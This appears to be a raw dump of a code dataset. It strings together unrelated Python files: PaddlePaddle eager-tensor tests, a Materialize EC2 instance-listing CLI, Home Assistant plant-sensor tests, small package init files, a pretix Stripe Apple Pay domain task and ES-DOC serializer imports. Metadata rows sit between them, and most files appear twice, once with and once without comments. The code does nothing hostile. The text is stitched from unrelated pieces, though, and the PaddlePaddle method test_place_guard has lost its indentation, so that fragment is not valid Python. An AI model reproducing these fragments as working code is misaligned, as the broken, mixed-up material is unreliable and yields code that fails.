    def test_properties(self):
        """Getters/setters of shape, name, persistable and stop_gradient."""
        print("Test_properties")
        with _test_eager_guard():
            paddle.set_device("cpu")
            arr = np.ones([4, 16, 16, 32]).astype('float32')
            tensor = paddle.to_tensor(arr, core.VarDesc.VarType.FP32,
                                      core.CPUPlace())
            self.assertEqual(tensor.shape, [4, 16, 16, 32])
            # name is writable and read back verbatim.
            tensor.name = 'tensor_name_test'
            self.assertEqual(tensor.name, 'tensor_name_test')
            # persistable toggles both ways.
            self.assertEqual(tensor.persistable, False)
            tensor.persistable = True
            self.assertEqual(tensor.persistable, True)
            tensor.persistable = False
            self.assertEqual(tensor.persistable, False)
            self.assertTrue(tensor.place.is_cpu_place())
            self.assertEqual(tensor._place_str, 'CPUPlace')
            # stop_gradient defaults to True and toggles both ways.
            self.assertEqual(tensor.stop_gradient, True)
            tensor.stop_gradient = False
            self.assertEqual(tensor.stop_gradient, False)
            tensor.stop_gradient = True
            self.assertEqual(tensor.stop_gradient, True)
    def test_global_properties(self):
        """_in_eager_mode is True only while inside _test_eager_guard."""
        print("Test_global_properties")
        self.assertFalse(core._in_eager_mode())
        with _test_eager_guard():
            self.assertTrue(core._in_eager_mode())
        # The guard must restore the previous (non-eager) mode on exit.
        self.assertFalse(core._in_eager_mode())
def test_place_guard(self):
core._enable_eager_mode()
if core.is_compiled_with_cuda():
paddle.set_device("gpu:0")
with paddle.fluid.framework._dygraph_place_guard(core.CPUPlace()):
self.assertTrue(core.eager._get_expected_place().is_cpu_place())
else:
paddle.set_device("cpu")
with paddle.fluid.framework._dygraph_place_guard(core.CPUPlace()):
self.assertTrue(core.eager._get_expected_place().is_cpu_place())
core._disable_eager_mode()
class EagerParamBaseUsageTestCase(unittest.TestCase):
    """Exercise EagerParamBase behaviour through high-level paddle.nn APIs.

    Fix: the private helper was misspelled ``func_fp16_initilaizer``; it is
    renamed to ``func_fp16_initializer`` (definition and both call sites
    live in this class, so no external caller is affected).
    """

    def test_print(self):
        """A parameter created in eager mode can be printed."""
        with _test_eager_guard():
            linear = paddle.nn.Linear(3, 3, bias_attr=False)
            print(linear.weight)

    def test_copy(self):
        """deepcopy and _copy_to must both preserve parameter values."""
        with _test_eager_guard():
            linear = paddle.nn.Linear(1, 3)
            linear_copy = copy.deepcopy(linear)
            linear_copy2 = linear.weight._copy_to(core.CPUPlace(), True)
            self.assertTrue(
                np.array_equal(linear.weight.numpy(),
                               linear_copy.weight.numpy()))
            self.assertTrue(
                np.array_equal(linear.weight.numpy(), linear_copy2.numpy()))

    def func_fp16_initializer(self):
        """Build Linear layers with several initializers under float16.

        Returns the four weight arrays; the default dtype is restored to
        float32 before returning.
        """
        paddle.set_default_dtype("float16")
        linear1 = paddle.nn.Linear(1, 3, bias_attr=False)
        linear2 = paddle.nn.Linear(
            1,
            3,
            bias_attr=False,
            weight_attr=paddle.fluid.initializer.Uniform())
        linear3 = paddle.nn.Linear(
            1,
            3,
            bias_attr=False,
            weight_attr=paddle.fluid.initializer.TruncatedNormalInitializer())
        linear4 = paddle.nn.Linear(
            1,
            3,
            bias_attr=False,
            weight_attr=paddle.fluid.initializer.MSRAInitializer())
        res = [
            linear1.weight.numpy(), linear2.weight.numpy(),
            linear3.weight.numpy(), linear4.weight.numpy()
        ]
        paddle.set_default_dtype("float32")
        return res

    def test_fp16_initializer(self):
        """fp16 initializers must give the same weights in eager and legacy mode."""
        res1 = list()
        res2 = list()
        # NOTE(review): the seed is set once and consumed by the first call;
        # this relies on both modes drawing from the same RNG stream — confirm.
        paddle.seed(102)
        paddle.framework.random._manual_program_seed(102)
        with _test_eager_guard():
            res1 = self.func_fp16_initializer()
        res2 = self.func_fp16_initializer()
        for i in range(len(res1)):
            self.assertTrue(np.array_equal(res1[i], res2[i]))

    def func_layer_helper_base(self, value):
        """Round-trip *value* through LayerHelperBase.to_variable."""
        base = paddle.fluid.layer_helper_base.LayerHelperBase("test_layer",
                                                              "test_layer")
        return base.to_variable(value).numpy()

    def func_base_to_variable(self, value):
        # Returns None; callers only check that the call does not raise.
        paddle.fluid.dygraph.base.to_variable(value)

    def test_to_variable(self):
        """to_variable must behave identically in eager and legacy modes."""
        value = np.random.rand(4, 16, 16, 32).astype('float32')
        res1 = None
        res3 = None
        with _test_eager_guard():
            res1 = self.func_layer_helper_base(value)
            res3 = self.func_base_to_variable(value)
        res2 = self.func_layer_helper_base(value)
        res4 = self.func_base_to_variable(value)
        self.assertTrue(np.array_equal(res1, res2))
        # res3/res4 are both None (func_base_to_variable has no return value),
        # so this assertion only verifies that neither call raised.
        self.assertTrue(np.array_equal(res3, res4))

    def test_backward_with_single_tensor(self):
        """backward() on a leaf tensor fills its gradient with ones."""
        arr4 = np.random.rand(4, 16, 16, 32).astype('float32')
        egr_tensor12 = core.eager.EagerTensor(arr4, core.CPUPlace())
        egr_tensor12.retain_grads()
        arr = np.ones([4, 16, 16, 32]).astype('float32')
        self.assertEqual(egr_tensor12.persistable, False)
        self.assertTrue("generated_tensor" in egr_tensor12.name)
        self.assertEqual(egr_tensor12.shape, [4, 16, 16, 32])
        self.assertEqual(egr_tensor12.dtype, core.VarDesc.VarType.FP32)
        self.assertEqual(egr_tensor12.stop_gradient, True)
        self.assertTrue(egr_tensor12.place._equals(paddle.fluid.CPUPlace()))
        self.assertTrue(np.array_equal(egr_tensor12.numpy(), arr4))
        # Before backward() the gradient is still None.
        self.assertTrue(np.array_equal(egr_tensor12.gradient(), None))
        egr_tensor12.backward()
        self.assertTrue(np.array_equal(egr_tensor12.gradient(), arr))
class EagerGuardTestCase(unittest.TestCase):
    """Sanity check for the _test_eager_guard context manager itself."""

    def test__test_eager_guard(self):
        """Eager mode must be reported as active inside the guard."""
        tracer = paddle.fluid.dygraph.tracer.Tracer()
        with _test_eager_guard(tracer):
            self.assertTrue(_in_eager_mode())


if __name__ == "__main__":
    unittest.main()
| true | true |
f7260a0d88edffe8d516cb9fd3952c72cf448a40 | 1,339 | py | Python | misc/python/materialize/cli/scratch/mine.py | moyun/materialize | 58a59986abfa391375f5178d6fe742c5328155ac | [
"MIT"
] | 1 | 2021-04-02T20:41:35.000Z | 2021-04-02T20:41:35.000Z | misc/python/materialize/cli/scratch/mine.py | moyun/materialize | 58a59986abfa391375f5178d6fe742c5328155ac | [
"MIT"
] | 289 | 2021-02-12T22:25:15.000Z | 2022-03-27T22:12:28.000Z | misc/python/materialize/cli/scratch/mine.py | moyun/materialize | 58a59986abfa391375f5178d6fe742c5328155ac | [
"MIT"
] | 1 | 2021-07-09T11:51:59.000Z | 2021-07-09T11:51:59.000Z | # Copyright Materialize, Inc. and contributors. All rights reserved.
#
# Use of this software is governed by the Business Source License
# included in the LICENSE file at the root of this repository.
#
# As of the Change Date specified in that file, in accordance with
# the Business Source License, use of this software will be governed
# by the Apache License, Version 2.0.
import argparse
from typing import Callable
import boto3
from mypy_boto3_ec2.service_resource import Instance
from materialize.cli.scratch import check_required_vars
from materialize.scratch import launched_by, print_instances, tags, whoami
def configure_parser(parser: argparse.ArgumentParser) -> None:
    """Attach the `mine` subcommand's arguments to *parser*.

    Verifies the required environment variables up front, then registers
    the positional user filter and the two display options.
    """
    check_required_vars()
    parser.add_argument(
        "who",
        nargs="*",
        default=[whoami()],
        help="Whose instances to show (defaults to yourself)",
    )
    parser.add_argument("--all", action="store_true", help="Show all instances")
    parser.add_argument("--output-format", default="table", choices=["table", "csv"])
def run(args: argparse.Namespace) -> None:
    """Print the EC2 instances selected by *args*.

    Shows every instance when ``--all`` was given, otherwise only the
    instances whose launch tags match one of the requested users.

    Fix: the local predicate was named ``filter``, shadowing the builtin,
    and the result list was cryptically named ``ists``.
    """
    if args.all:
        def keep(_instance: Instance) -> bool:
            return True
    else:
        def keep(instance: Instance) -> bool:
            return launched_by(tags(instance)) in args.who
    instances = [i for i in boto3.resource("ec2").instances.all() if keep(i)]
    print_instances(instances, args.output_format)
| 33.475 | 87 | 0.720687 |
import argparse
from typing import Callable
import boto3
from mypy_boto3_ec2.service_resource import Instance
from materialize.cli.scratch import check_required_vars
from materialize.scratch import launched_by, print_instances, tags, whoami
def configure_parser(parser: argparse.ArgumentParser) -> None:
check_required_vars()
parser.add_argument(
"who",
nargs="*",
help="Whose instances to show (defaults to yourself)",
default=[whoami()],
)
parser.add_argument("--all", help="Show all instances", action="store_true")
parser.add_argument("--output-format", choices=["table", "csv"], default="table")
def run(args: argparse.Namespace) -> None:
filter: Callable[[Instance], bool] = (
(lambda _i: True) if args.all else (lambda i: launched_by(tags(i)) in args.who)
)
ists = [i for i in boto3.resource("ec2").instances.all() if filter(i)]
print_instances(ists, args.output_format)
| true | true |
f7260a5cf2eade315c5bf110204cd445c7e662a3 | 7,966 | py | Python | tests/components/plant/test_init.py | domwillcode/home-assistant | f170c80bea70c939c098b5c88320a1c789858958 | [
"Apache-2.0"
] | 6 | 2020-07-18T16:33:25.000Z | 2021-09-26T09:52:04.000Z | tests/components/plant/test_init.py | domwillcode/home-assistant | f170c80bea70c939c098b5c88320a1c789858958 | [
"Apache-2.0"
] | 38 | 2020-07-23T07:14:17.000Z | 2022-03-31T06:01:46.000Z | tests/components/plant/test_init.py | klauern/home-assistant-core | c18ba6aec0627e6afb6442c678edb5ff2bb17db6 | [
"Apache-2.0"
] | 5 | 2020-03-29T00:29:13.000Z | 2021-09-06T20:58:40.000Z | """Unit tests for platform/plant.py."""
from datetime import datetime, timedelta
import pytest
from homeassistant.components import recorder
import homeassistant.components.plant as plant
from homeassistant.const import (
ATTR_UNIT_OF_MEASUREMENT,
CONDUCTIVITY,
STATE_OK,
STATE_PROBLEM,
STATE_UNAVAILABLE,
STATE_UNKNOWN,
)
from homeassistant.core import State
from homeassistant.setup import async_setup_component
from tests.common import init_recorder_component
GOOD_DATA = {
"moisture": 50,
"battery": 90,
"temperature": 23.4,
"conductivity": 777,
"brightness": 987,
}
BRIGHTNESS_ENTITY = "sensor.mqtt_plant_brightness"
MOISTURE_ENTITY = "sensor.mqtt_plant_moisture"
GOOD_CONFIG = {
"sensors": {
"moisture": MOISTURE_ENTITY,
"battery": "sensor.mqtt_plant_battery",
"temperature": "sensor.mqtt_plant_temperature",
"conductivity": "sensor.mqtt_plant_conductivity",
"brightness": BRIGHTNESS_ENTITY,
},
"min_moisture": 20,
"max_moisture": 60,
"min_battery": 17,
"min_conductivity": 500,
"min_temperature": 15,
"min_brightness": 500,
}
async def test_valid_data(hass):
    """Feed every sensor reading in GOOD_DATA and expect an OK plant."""
    sensor = plant.Plant("my plant", GOOD_CONFIG)
    sensor.entity_id = "sensor.mqtt_plant_battery"
    sensor.hass = hass
    # Replay one state change per configured sensor (old state is None).
    for reading, value in GOOD_DATA.items():
        sensor.state_changed(
            GOOD_CONFIG["sensors"][reading],
            None,
            State(GOOD_CONFIG["sensors"][reading], value),
        )
    assert sensor.state == "ok"
    attrib = sensor.state_attributes
    for reading, value in GOOD_DATA.items():
        # Every reading must be exposed unchanged as a state attribute.
        assert attrib[reading] == value


async def test_low_battery(hass):
    """A battery reading below min_battery flags the plant as a problem."""
    sensor = plant.Plant("other plant", GOOD_CONFIG)
    sensor.entity_id = "sensor.mqtt_plant_battery"
    sensor.hass = hass
    assert sensor.state_attributes["problem"] == "none"
    # 45 -> 10 crosses the configured min_battery threshold of 17.
    sensor.state_changed(
        "sensor.mqtt_plant_battery",
        State("sensor.mqtt_plant_battery", 45),
        State("sensor.mqtt_plant_battery", 10),
    )
    assert sensor.state == "problem"
    assert sensor.state_attributes["problem"] == "battery low"
async def test_initial_states(hass):
    """Plant initialises its attributes from a sensor that already exists."""
    # The moisture sensor is set *before* the plant component is set up.
    hass.states.async_set(MOISTURE_ENTITY, 5, {ATTR_UNIT_OF_MEASUREMENT: CONDUCTIVITY})
    plant_name = "some_plant"
    assert await async_setup_component(
        hass, plant.DOMAIN, {plant.DOMAIN: {plant_name: GOOD_CONFIG}}
    )
    await hass.async_block_till_done()
    state = hass.states.get(f"plant.{plant_name}")
    assert 5 == state.attributes[plant.READING_MOISTURE]


async def test_update_states(hass):
    """A moisture update below min_moisture puts the plant in problem state."""
    plant_name = "some_plant"
    assert await async_setup_component(
        hass, plant.DOMAIN, {plant.DOMAIN: {plant_name: GOOD_CONFIG}}
    )
    # 5 is below the configured min_moisture of 20.
    hass.states.async_set(MOISTURE_ENTITY, 5, {ATTR_UNIT_OF_MEASUREMENT: CONDUCTIVITY})
    await hass.async_block_till_done()
    state = hass.states.get(f"plant.{plant_name}")
    assert STATE_PROBLEM == state.state
    assert 5 == state.attributes[plant.READING_MOISTURE]


async def test_unavailable_state(hass):
    """An unavailable sensor reading is treated as a plant problem."""
    plant_name = "some_plant"
    assert await async_setup_component(
        hass, plant.DOMAIN, {plant.DOMAIN: {plant_name: GOOD_CONFIG}}
    )
    hass.states.async_set(
        MOISTURE_ENTITY, STATE_UNAVAILABLE, {ATTR_UNIT_OF_MEASUREMENT: CONDUCTIVITY}
    )
    await hass.async_block_till_done()
    state = hass.states.get(f"plant.{plant_name}")
    assert state.state == STATE_PROBLEM
    # The raw "unavailable" marker is passed through as the attribute value.
    assert state.attributes[plant.READING_MOISTURE] == STATE_UNAVAILABLE


async def test_state_problem_if_unavailable(hass):
    """A sensor turning unavailable after a valid value raises a problem."""
    plant_name = "some_plant"
    assert await async_setup_component(
        hass, plant.DOMAIN, {plant.DOMAIN: {plant_name: GOOD_CONFIG}}
    )
    # First a valid in-range reading: the plant is OK.
    hass.states.async_set(MOISTURE_ENTITY, 42, {ATTR_UNIT_OF_MEASUREMENT: CONDUCTIVITY})
    await hass.async_block_till_done()
    state = hass.states.get(f"plant.{plant_name}")
    assert state.state == STATE_OK
    assert state.attributes[plant.READING_MOISTURE] == 42
    # Then the sensor drops out: the plant must flip to problem.
    hass.states.async_set(
        MOISTURE_ENTITY, STATE_UNAVAILABLE, {ATTR_UNIT_OF_MEASUREMENT: CONDUCTIVITY}
    )
    await hass.async_block_till_done()
    state = hass.states.get(f"plant.{plant_name}")
    assert state.state == STATE_PROBLEM
    assert state.attributes[plant.READING_MOISTURE] == STATE_UNAVAILABLE
@pytest.mark.skipif(
    plant.ENABLE_LOAD_HISTORY is False,
    # NOTE(review): the adjacent string literals below concatenate without
    # spaces, so the reason reads "...thusthis...becomestable" — fix separately
    # (a doc-only change must not alter runtime strings).
    reason="tests for loading from DB are unstable, thus"
    "this feature is turned of until tests become"
    "stable",
)
async def test_load_from_db(hass):
    """Bootstrap the brightness history from the recorder database.

    Only runs when history loading is enabled via plant.ENABLE_LOAD_HISTORY.
    """
    init_recorder_component(hass)
    plant_name = "wise_plant"
    # Record three brightness values so a history exists before setup.
    for value in [20, 30, 10]:
        hass.states.async_set(
            BRIGHTNESS_ENTITY, value, {ATTR_UNIT_OF_MEASUREMENT: "Lux"}
        )
        await hass.async_block_till_done()
    # wait for the recorder to really store the data
    hass.data[recorder.DATA_INSTANCE].block_till_done()
    assert await async_setup_component(
        hass, plant.DOMAIN, {plant.DOMAIN: {plant_name: GOOD_CONFIG}}
    )
    await hass.async_block_till_done()
    state = hass.states.get(f"plant.{plant_name}")
    assert STATE_UNKNOWN == state.state
    # The maximum of the recorded values (30) must be restored from the DB.
    max_brightness = state.attributes.get(plant.ATTR_MAX_BRIGHTNESS_HISTORY)
    assert 30 == max_brightness
async def test_brightness_history(hass):
    """Test the min_brightness check.

    Brightness is evaluated against its daily maximum, so a low reading
    after a sufficiently bright one must not flag a problem.
    """
    plant_name = "some_plant"
    config = {plant.DOMAIN: {plant_name: GOOD_CONFIG}}
    assert await async_setup_component(hass, plant.DOMAIN, config)

    async def set_brightness(value):
        """Publish a brightness reading and return the resulting plant state."""
        hass.states.async_set(
            BRIGHTNESS_ENTITY, value, {ATTR_UNIT_OF_MEASUREMENT: "lux"}
        )
        await hass.async_block_till_done()
        return hass.states.get(f"plant.{plant_name}")

    state = await set_brightness(100)
    assert state.state == STATE_PROBLEM
    state = await set_brightness(600)
    assert state.state == STATE_OK
    # The stored daily maximum (600) keeps the plant OK even though the
    # current reading is below the configured minimum again.
    state = await set_brightness(100)
    assert state.state == STATE_OK
def test_daily_history_no_data(hass):
    """An empty history reports no maximum."""
    history = plant.DailyHistory(3)
    assert history.max is None


def test_daily_history_one_day(hass):
    """Measurements within one day track the running maximum."""
    history = plant.DailyHistory(3)
    values = [-2, 10, 0, 5, 20]
    for index, value in enumerate(values):
        history.add_measurement(value)
        # Everything lands in a single day bucket.
        assert len(history._days) == 1
        assert history.max == max(values[: index + 1])


def test_daily_history_multiple_days(hass):
    """The maximum is tracked over a sliding window of days."""
    history = plant.DailyHistory(3)
    today = datetime.now()
    days = [today - timedelta(days=offset) for offset in (3, 2, 1, 0)]
    expected_maxima = [10, 10, 10, 7]
    for day, value, expected in zip(days, [10, 1, 7, 3], expected_maxima):
        history.add_measurement(value, day)
        # Once the window slides past day -3, its value (10) drops out.
        assert history.max == expected
| 33.330544 | 88 | 0.700603 | from datetime import datetime, timedelta
import pytest
from homeassistant.components import recorder
import homeassistant.components.plant as plant
from homeassistant.const import (
ATTR_UNIT_OF_MEASUREMENT,
CONDUCTIVITY,
STATE_OK,
STATE_PROBLEM,
STATE_UNAVAILABLE,
STATE_UNKNOWN,
)
from homeassistant.core import State
from homeassistant.setup import async_setup_component
from tests.common import init_recorder_component
GOOD_DATA = {
"moisture": 50,
"battery": 90,
"temperature": 23.4,
"conductivity": 777,
"brightness": 987,
}
BRIGHTNESS_ENTITY = "sensor.mqtt_plant_brightness"
MOISTURE_ENTITY = "sensor.mqtt_plant_moisture"
GOOD_CONFIG = {
"sensors": {
"moisture": MOISTURE_ENTITY,
"battery": "sensor.mqtt_plant_battery",
"temperature": "sensor.mqtt_plant_temperature",
"conductivity": "sensor.mqtt_plant_conductivity",
"brightness": BRIGHTNESS_ENTITY,
},
"min_moisture": 20,
"max_moisture": 60,
"min_battery": 17,
"min_conductivity": 500,
"min_temperature": 15,
"min_brightness": 500,
}
async def test_valid_data(hass):
sensor = plant.Plant("my plant", GOOD_CONFIG)
sensor.entity_id = "sensor.mqtt_plant_battery"
sensor.hass = hass
for reading, value in GOOD_DATA.items():
sensor.state_changed(
GOOD_CONFIG["sensors"][reading],
None,
State(GOOD_CONFIG["sensors"][reading], value),
)
assert sensor.state == "ok"
attrib = sensor.state_attributes
for reading, value in GOOD_DATA.items():
assert attrib[reading] == value
async def test_low_battery(hass):
sensor = plant.Plant("other plant", GOOD_CONFIG)
sensor.entity_id = "sensor.mqtt_plant_battery"
sensor.hass = hass
assert sensor.state_attributes["problem"] == "none"
sensor.state_changed(
"sensor.mqtt_plant_battery",
State("sensor.mqtt_plant_battery", 45),
State("sensor.mqtt_plant_battery", 10),
)
assert sensor.state == "problem"
assert sensor.state_attributes["problem"] == "battery low"
async def test_initial_states(hass):
hass.states.async_set(MOISTURE_ENTITY, 5, {ATTR_UNIT_OF_MEASUREMENT: CONDUCTIVITY})
plant_name = "some_plant"
assert await async_setup_component(
hass, plant.DOMAIN, {plant.DOMAIN: {plant_name: GOOD_CONFIG}}
)
await hass.async_block_till_done()
state = hass.states.get(f"plant.{plant_name}")
assert 5 == state.attributes[plant.READING_MOISTURE]
async def test_update_states(hass):
plant_name = "some_plant"
assert await async_setup_component(
hass, plant.DOMAIN, {plant.DOMAIN: {plant_name: GOOD_CONFIG}}
)
hass.states.async_set(MOISTURE_ENTITY, 5, {ATTR_UNIT_OF_MEASUREMENT: CONDUCTIVITY})
await hass.async_block_till_done()
state = hass.states.get(f"plant.{plant_name}")
assert STATE_PROBLEM == state.state
assert 5 == state.attributes[plant.READING_MOISTURE]
async def test_unavailable_state(hass):
plant_name = "some_plant"
assert await async_setup_component(
hass, plant.DOMAIN, {plant.DOMAIN: {plant_name: GOOD_CONFIG}}
)
hass.states.async_set(
MOISTURE_ENTITY, STATE_UNAVAILABLE, {ATTR_UNIT_OF_MEASUREMENT: CONDUCTIVITY}
)
await hass.async_block_till_done()
state = hass.states.get(f"plant.{plant_name}")
assert state.state == STATE_PROBLEM
assert state.attributes[plant.READING_MOISTURE] == STATE_UNAVAILABLE
async def test_state_problem_if_unavailable(hass):
plant_name = "some_plant"
assert await async_setup_component(
hass, plant.DOMAIN, {plant.DOMAIN: {plant_name: GOOD_CONFIG}}
)
hass.states.async_set(MOISTURE_ENTITY, 42, {ATTR_UNIT_OF_MEASUREMENT: CONDUCTIVITY})
await hass.async_block_till_done()
state = hass.states.get(f"plant.{plant_name}")
assert state.state == STATE_OK
assert state.attributes[plant.READING_MOISTURE] == 42
hass.states.async_set(
MOISTURE_ENTITY, STATE_UNAVAILABLE, {ATTR_UNIT_OF_MEASUREMENT: CONDUCTIVITY}
)
await hass.async_block_till_done()
state = hass.states.get(f"plant.{plant_name}")
assert state.state == STATE_PROBLEM
assert state.attributes[plant.READING_MOISTURE] == STATE_UNAVAILABLE
@pytest.mark.skipif(
plant.ENABLE_LOAD_HISTORY is False,
reason="tests for loading from DB are unstable, thus"
"this feature is turned of until tests become"
"stable",
)
async def test_load_from_db(hass):
init_recorder_component(hass)
plant_name = "wise_plant"
for value in [20, 30, 10]:
hass.states.async_set(
BRIGHTNESS_ENTITY, value, {ATTR_UNIT_OF_MEASUREMENT: "Lux"}
)
await hass.async_block_till_done()
hass.data[recorder.DATA_INSTANCE].block_till_done()
assert await async_setup_component(
hass, plant.DOMAIN, {plant.DOMAIN: {plant_name: GOOD_CONFIG}}
)
await hass.async_block_till_done()
state = hass.states.get(f"plant.{plant_name}")
assert STATE_UNKNOWN == state.state
max_brightness = state.attributes.get(plant.ATTR_MAX_BRIGHTNESS_HISTORY)
assert 30 == max_brightness
async def test_brightness_history(hass):
plant_name = "some_plant"
assert await async_setup_component(
hass, plant.DOMAIN, {plant.DOMAIN: {plant_name: GOOD_CONFIG}}
)
hass.states.async_set(BRIGHTNESS_ENTITY, 100, {ATTR_UNIT_OF_MEASUREMENT: "lux"})
await hass.async_block_till_done()
state = hass.states.get(f"plant.{plant_name}")
assert STATE_PROBLEM == state.state
hass.states.async_set(BRIGHTNESS_ENTITY, 600, {ATTR_UNIT_OF_MEASUREMENT: "lux"})
await hass.async_block_till_done()
state = hass.states.get(f"plant.{plant_name}")
assert STATE_OK == state.state
hass.states.async_set(BRIGHTNESS_ENTITY, 100, {ATTR_UNIT_OF_MEASUREMENT: "lux"})
await hass.async_block_till_done()
state = hass.states.get(f"plant.{plant_name}")
assert STATE_OK == state.state
def test_daily_history_no_data(hass):
dh = plant.DailyHistory(3)
assert dh.max is None
def test_daily_history_one_day(hass):
dh = plant.DailyHistory(3)
values = [-2, 10, 0, 5, 20]
for i in range(len(values)):
dh.add_measurement(values[i])
max_value = max(values[0 : i + 1])
assert 1 == len(dh._days)
assert dh.max == max_value
def test_daily_history_multiple_days(hass):
dh = plant.DailyHistory(3)
today = datetime.now()
today_minus_1 = today - timedelta(days=1)
today_minus_2 = today_minus_1 - timedelta(days=1)
today_minus_3 = today_minus_2 - timedelta(days=1)
days = [today_minus_3, today_minus_2, today_minus_1, today]
values = [10, 1, 7, 3]
max_values = [10, 10, 10, 7]
for i in range(len(days)):
dh.add_measurement(values[i], days[i])
assert max_values[i] == dh.max
| true | true |
f7260c42d605bb593528b63732665c5cf39180b2 | 59 | py | Python | core/python/spirit/parameters/__init__.py | SpiritSuperUser/spirit | fbe69c2a9b7a73e8f47d302c619303aea2a22ace | [
"MIT"
] | 2 | 2020-11-12T13:54:22.000Z | 2021-11-05T09:10:27.000Z | core/python/spirit/parameters/__init__.py | SpiritSuperUser/spirit | fbe69c2a9b7a73e8f47d302c619303aea2a22ace | [
"MIT"
] | null | null | null | core/python/spirit/parameters/__init__.py | SpiritSuperUser/spirit | fbe69c2a9b7a73e8f47d302c619303aea2a22ace | [
"MIT"
] | null | null | null | __all__ = ["gneb", "llg"]
from spirit.parameters import *
| 14.75 | 31 | 0.677966 | __all__ = ["gneb", "llg"]
from spirit.parameters import *
| true | true |
f7260dbc831f7d79b0b85a4ce2ff386597e672d5 | 226 | py | Python | src/robust_deid/sequence_tagging/dataset_builder/__init__.py | obi-ml-public/ehr_deidentification | c9deaf30b8317689d28a4267d15ec13baa9791cd | [
"MIT"
] | null | null | null | src/robust_deid/sequence_tagging/dataset_builder/__init__.py | obi-ml-public/ehr_deidentification | c9deaf30b8317689d28a4267d15ec13baa9791cd | [
"MIT"
] | null | null | null | src/robust_deid/sequence_tagging/dataset_builder/__init__.py | obi-ml-public/ehr_deidentification | c9deaf30b8317689d28a4267d15ec13baa9791cd | [
"MIT"
] | null | null | null | from .ner_labels import NERLabels
from .ner_dataset import NERDataset
from .label_mapper import LabelMapper
from .dataset_tokenizer import DatasetTokenizer
__all__=["NERLabels", "NERDataset", "LabelMapper", "DatasetTokenizer"] | 45.2 | 70 | 0.836283 | from .ner_labels import NERLabels
from .ner_dataset import NERDataset
from .label_mapper import LabelMapper
from .dataset_tokenizer import DatasetTokenizer
__all__=["NERLabels", "NERDataset", "LabelMapper", "DatasetTokenizer"] | true | true |
f7260dee0491f9cc625cee893dce44cee0a86ee8 | 1,461 | py | Python | src/pretix/plugins/stripe/tasks.py | NicsTr/pretix | e6d2380d9ed1836cc64a688b2be20d00a8500eab | [
"ECL-2.0",
"Apache-2.0"
] | 1 | 2020-04-25T00:11:00.000Z | 2020-04-25T00:11:00.000Z | src/pretix/plugins/stripe/tasks.py | NicsTr/pretix | e6d2380d9ed1836cc64a688b2be20d00a8500eab | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | src/pretix/plugins/stripe/tasks.py | NicsTr/pretix | e6d2380d9ed1836cc64a688b2be20d00a8500eab | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | import logging
from urllib.parse import urlsplit
import stripe
from django.conf import settings
from pretix.base.services.tasks import EventTask
from pretix.celery_app import app
from pretix.multidomain.urlreverse import get_event_domain
from pretix.plugins.stripe.models import RegisteredApplePayDomain
logger = logging.getLogger(__name__)
def get_domain_for_event(event):
    """Return the domain (hostname) to register with Stripe for *event*.

    Falls back to the hostname of the configured SITE_URL when the event
    has no dedicated domain.  NOTE(review): any port in SITE_URL is dropped
    here — presumably intentional because Apple Pay domain verification
    operates on hostnames; confirm.
    """
    domain = get_event_domain(event, fallback=True)
    if not domain:
        siteurlsplit = urlsplit(settings.SITE_URL)
        return siteurlsplit.hostname
    return domain
def get_stripe_account_key(prov):
    """Return the Stripe account identifier for a payment provider.

    A configured Stripe Connect user id takes precedence; otherwise the
    provider's own publishable key identifies the account.
    """
    return prov.settings.connect_user_id or prov.settings.publishable_key
@app.task(base=EventTask, max_retries=5, default_retry_delay=1)
def stripe_verify_domain(event, domain):
    """Celery task: register *domain* with Stripe for Apple Pay verification.

    Skips domains already recorded for the event's Stripe account; on a
    Stripe error the failure is logged and the task ends (Celery retries
    per the decorator settings only if the task raises, which this does
    not — NOTE(review): confirm the intended retry behaviour).
    """
    # Imported lazily to avoid a circular import with the payment module.
    from pretix.plugins.stripe.payment import StripeCC
    prov = StripeCC(event)
    account = get_stripe_account_key(prov)
    if RegisteredApplePayDomain.objects.filter(account=account, domain=domain).exists():
        return
    try:
        resp = stripe.ApplePayDomain.create(
            domain_name=domain,
            **prov.api_kwargs
        )
    except stripe.error.StripeError:
        logger.exception('Could not verify domain with Stripe')
    else:
        # Only live-mode registrations are cached; test-mode calls are
        # repeated on the next invocation.
        if resp.livemode:
            RegisteredApplePayDomain.objects.create(
                domain=domain,
                account=account
            )
| 28.096154 | 88 | 0.718686 | import logging
from urllib.parse import urlsplit
import stripe
from django.conf import settings
from pretix.base.services.tasks import EventTask
from pretix.celery_app import app
from pretix.multidomain.urlreverse import get_event_domain
from pretix.plugins.stripe.models import RegisteredApplePayDomain
logger = logging.getLogger(__name__)
def get_domain_for_event(event):
domain = get_event_domain(event, fallback=True)
if not domain:
siteurlsplit = urlsplit(settings.SITE_URL)
return siteurlsplit.hostname
return domain
def get_stripe_account_key(prov):
if prov.settings.connect_user_id:
return prov.settings.connect_user_id
else:
return prov.settings.publishable_key
@app.task(base=EventTask, max_retries=5, default_retry_delay=1)
def stripe_verify_domain(event, domain):
from pretix.plugins.stripe.payment import StripeCC
prov = StripeCC(event)
account = get_stripe_account_key(prov)
if RegisteredApplePayDomain.objects.filter(account=account, domain=domain).exists():
return
try:
resp = stripe.ApplePayDomain.create(
domain_name=domain,
**prov.api_kwargs
)
except stripe.error.StripeError:
logger.exception('Could not verify domain with Stripe')
else:
if resp.livemode:
RegisteredApplePayDomain.objects.create(
domain=domain,
account=account
)
| true | true |
f7260ece4a1e3fc3b43d89b2b456333299b82c9d | 2,817 | py | Python | Q/questionnaire/serializers/serializers_ontologies.py | ES-DOC/esdoc-questionnaire | 9301eda375c4046323265b37ba96d94c94bf8b11 | [
"MIT"
] | null | null | null | Q/questionnaire/serializers/serializers_ontologies.py | ES-DOC/esdoc-questionnaire | 9301eda375c4046323265b37ba96d94c94bf8b11 | [
"MIT"
] | 477 | 2015-01-07T18:22:27.000Z | 2017-07-17T15:05:48.000Z | Q/questionnaire/serializers/serializers_ontologies.py | ES-DOC/esdoc-questionnaire | 9301eda375c4046323265b37ba96d94c94bf8b11 | [
"MIT"
] | null | null | null | ####################
# ES-DOC CIM Questionnaire
# Copyright (c) 2017 ES-DOC. All rights reserved.
#
# University of Colorado, Boulder
# http://cires.colorado.edu/
#
# This project is distributed according to the terms of the MIT license [http://www.opensource.org/licenses/MIT].
####################
from django.core.exceptions import ValidationError as DjangoValidationError
from rest_framework.exceptions import ValidationError as RestValidationError
from rest_framework import serializers
from uuid import UUID as generate_uuid
from Q.questionnaire.serializers.serializers_base import QListSerializer, QSerializer, QVersionSerializerField
from Q.questionnaire.models.models_ontologies import QOntology
